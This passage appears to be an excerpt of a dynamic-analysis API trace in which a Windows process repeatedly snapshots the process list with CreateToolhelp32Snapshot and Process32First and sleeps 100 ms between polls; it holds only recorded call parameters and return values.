th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.391] Sleep (dwMilliseconds=0x64) [0227.404] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0227.414] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.566] Sleep (dwMilliseconds=0x64) [0227.608] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0227.713] Process32First (in: hSnapshot=0xdc4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.916] Sleep (dwMilliseconds=0x64) [0227.937] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0227.955] Process32First (in: hSnapshot=0xdc4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.081] Sleep (dwMilliseconds=0x64) [0228.121] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0228.133] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.206] Sleep (dwMilliseconds=0x64) [0228.247] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0228.259] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.389] Sleep (dwMilliseconds=0x64) [0228.430] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0228.517] Process32First (in: hSnapshot=0xdc4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.616] Sleep (dwMilliseconds=0x64) [0228.670] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0228.728] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.001] Sleep (dwMilliseconds=0x64) [0229.014] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0229.030] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.117] Sleep (dwMilliseconds=0x64) [0229.167] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0229.179] Process32First (in: hSnapshot=0xdc4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.252] Sleep (dwMilliseconds=0x64) [0229.292] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0229.306] Process32First (in: hSnapshot=0xdc4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.384] Sleep (dwMilliseconds=0x64) [0229.466] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0229.475] Process32First (in: hSnapshot=0xdc4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.558] Sleep (dwMilliseconds=0x64) [0229.602] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0229.663] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.761] Sleep (dwMilliseconds=0x64) [0229.781] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0229.846] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.977] Sleep (dwMilliseconds=0x64) [0230.026] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0230.038] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.111] Sleep (dwMilliseconds=0x64) [0230.154] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0230.163] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.235] Sleep (dwMilliseconds=0x64) [0230.279] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0230.288] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.389] Sleep (dwMilliseconds=0x64) [0230.405] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0230.415] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.535] Sleep (dwMilliseconds=0x64) [0230.593] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0230.603] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.768] Sleep (dwMilliseconds=0x64) [0230.826] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0230.869] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.085] Sleep (dwMilliseconds=0x64) [0231.091] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0231.104] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.174] Sleep (dwMilliseconds=0x64) [0231.219] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0231.233] Process32First (in: hSnapshot=0xdc4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.344] Sleep (dwMilliseconds=0x64) [0231.389] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0231.398] Process32First (in: hSnapshot=0xdc4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.577] Sleep (dwMilliseconds=0x64) [0231.648] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0231.665] Process32First (in: hSnapshot=0xdc4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.891] Sleep (dwMilliseconds=0x64) [0231.951] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0231.961] Process32First (in: hSnapshot=0xdc4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.327] Sleep (dwMilliseconds=0x64) [0232.674] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0232.686] Process32First (in: hSnapshot=0x1b08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.953] Sleep (dwMilliseconds=0x64) [0233.055] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0233.064] Process32First (in: hSnapshot=0x1b08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.204] Sleep (dwMilliseconds=0x64) [0233.226] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0233.235] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.299] Sleep (dwMilliseconds=0x64) [0233.317] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0233.327] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.499] Sleep (dwMilliseconds=0x64) [0233.544] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0233.555] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.659] Sleep (dwMilliseconds=0x64) [0233.721] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0233.761] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.831] Sleep (dwMilliseconds=0x64) [0233.842] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0233.851] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.030] Sleep (dwMilliseconds=0x64) [0234.077] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0234.087] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.253] Sleep (dwMilliseconds=0x64) [0234.266] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0234.276] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.333] Sleep (dwMilliseconds=0x64) [0234.339] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0234.349] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.501] Sleep (dwMilliseconds=0x64) [0234.606] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0234.617] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.726] Sleep (dwMilliseconds=0x64) [0234.733] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0234.741] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.815] Sleep (dwMilliseconds=0x64) [0234.858] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0234.866] Process32First (in: hSnapshot=0x1b08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.044] Sleep (dwMilliseconds=0x64) [0235.092] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0235.101] Process32First (in: hSnapshot=0x1b08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.211] Sleep (dwMilliseconds=0x64) [0235.225] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0235.234] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.502] Sleep (dwMilliseconds=0x64) [0235.546] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0235.554] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.664] Sleep (dwMilliseconds=0x64) [0235.716] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0235.724] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.816] Sleep (dwMilliseconds=0x64) [0235.823] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0235.835] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.949] Sleep (dwMilliseconds=0x64) [0235.999] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0236.008] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.128] Sleep (dwMilliseconds=0x64) [0236.172] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0236.181] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.290] Sleep (dwMilliseconds=0x64) [0236.309] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0236.318] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.421] Sleep (dwMilliseconds=0x64) [0236.469] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0236.480] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.584] Sleep (dwMilliseconds=0x64) [0236.621] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0236.630] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.696] Sleep (dwMilliseconds=0x64) [0236.698] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0236.707] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.773] Sleep (dwMilliseconds=0x64) [0236.782] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0236.797] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.914] Sleep (dwMilliseconds=0x64) [0236.982] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0236.991] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.102] Sleep (dwMilliseconds=0x64) [0237.172] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0237.192] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.257] Sleep (dwMilliseconds=0x64) [0237.261] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0237.270] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.381] Sleep (dwMilliseconds=0x64) [0237.417] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0237.429] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.538] Sleep (dwMilliseconds=0x64) [0237.593] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0237.604] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.734] Sleep (dwMilliseconds=0x64) [0237.773] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0237.790] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.972] Sleep (dwMilliseconds=0x64) [0238.014] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0238.023] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.307] Sleep (dwMilliseconds=0x64) [0238.324] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0238.337] Process32First (in: hSnapshot=0x1b08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.853] Sleep (dwMilliseconds=0x64) [0238.908] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0238.922] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.053] Sleep (dwMilliseconds=0x64) [0239.109] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0239.126] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.304] Sleep (dwMilliseconds=0x64) [0239.463] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0239.477] Process32First (in: hSnapshot=0x1b08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 